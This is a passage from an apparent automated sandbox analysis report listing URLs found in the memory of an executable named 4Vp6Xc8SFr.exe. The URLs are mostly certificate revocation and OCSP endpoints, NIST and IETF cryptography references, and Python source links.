00000000.00000003.256283797.0000025976DD3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255917845.0000025976DD3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254382087.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255758982.0000025976DD3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.256710021.0000025976DD3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.257158297.0000025976DD3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.256447263.0000025976DD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9B8B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314533021.0000017AC9B88000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9B41000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315855580.0000017AC9B95000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326611429.0000017AC9FCC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317531193.0000017AC9FCB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316371263.0000017AC9FDB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.316788721.0000017AC9F86000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.314654094.0000017AC97A0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.321586764.0000017AC98F0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.329841009.0000017ACA3DC000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309724972.0000017AC979B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311725138.0000017AC979F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313220480.0000017AC97A0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308950317.0000017AC9797000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.321301297.0000017AC97A5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.322585761.0000017AC9CF0000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.330094693.0000017ACA410000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326187933.0000017AC9F8A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.316115753.0000017AC9707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.315732154.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.322134173.0000017AC9BCE000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310364004.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316092686.0000017AC9BCD000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.312257969.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.311130928.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308418666.0000017AC9BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.311013401.0000017AC75BB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317030830.0000017AC75E4000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.324813601.0000017AC9EFF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.317461335.0000017AC9EFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://httpbin.org/
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.270118444.0000017ACA03D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276157529.0000017ACA0EC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255019183.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260232942.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260139268.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254382087.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DCD000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254482843.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259054046.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254324143.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259483765.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255103306.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.258333503.0000025976DCF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254625193.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254845722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255019183.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260232942.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260139268.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254382087.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DCD000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.258333503.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255235042.0000025976DD2000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254482843.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259054046.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254324143.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259483765.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255103306.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.258333503.0000025976DCF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254625193.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254845722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255019183.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260232942.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260139268.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254382087.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DCD000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.258333503.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255235042.0000025976DD2000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254482843.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259054046.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254324143.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259483765.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255103306.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254625193.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254845722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.255019183.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254728364.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260232942.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260139268.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.260683507.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254382087.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254898897.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.258333503.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254482843.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259054046.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254324143.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.259483765.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.255103306.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254625193.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000000.00000003.254845722.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.276807115.0000017ACA033000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269069124.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA06D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276560722.0000017ACA055000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269455151.0000017ACA051000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA06D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/A
Source: 4Vp6Xc8SFr.exe	String found in binary or memory: http://schemas.mi
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.319535733.0000017AC9F5D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.315648468.0000017AC9F5D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313439551.0000017AC9F5D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.309288676.0000017AC9F5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.329841009.0000017ACA3DC000.00000004.00001000.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.329841009.0000017ACA300000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313746956.0000017AC9F82000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9F94000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.310101800.0000017AC9F7B000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316400323.0000017AC9FA9000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316573052.0000017AC9FAA000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9F7F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: 4Vp6Xc8SFr.exe, 00000001.00000002.324535554.0000017AC9DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 4Vp6Xc8SFr.exe, 00000000.00000003.258939168.0000025976DC5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.313483225.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316155835.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.316371263.0000017AC9FDB000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000002.326611429.0000017AC9FDC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308139438.0000017AC9FBF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.270118444.0000017ACA03D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276157529.0000017ACA0EC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.275933215.0000017ACA0BF000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269865608.0000017ACA08E000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.307020159.0000017ACA046000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.308722269.0000017ACA047000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276648532.0000017ACA03F000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269475039.0000017ACA08D000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.268919432.0000017ACA086000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: 4Vp6Xc8SFr.exe, 00000001.00000003.268784547.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.276157529.0000017ACA0EC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269101774.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269343833.0000017ACA0AC000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269301699.0000017ACA08A000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269509616.0000017ACA0B1000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.270057723.0000017ACA0C0000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 00000001.00000003.269945464.0000017ACA0D3000.00000004.00000020.00020000.00000000.sdmp, 4Vp6Xc8SFr.exe, 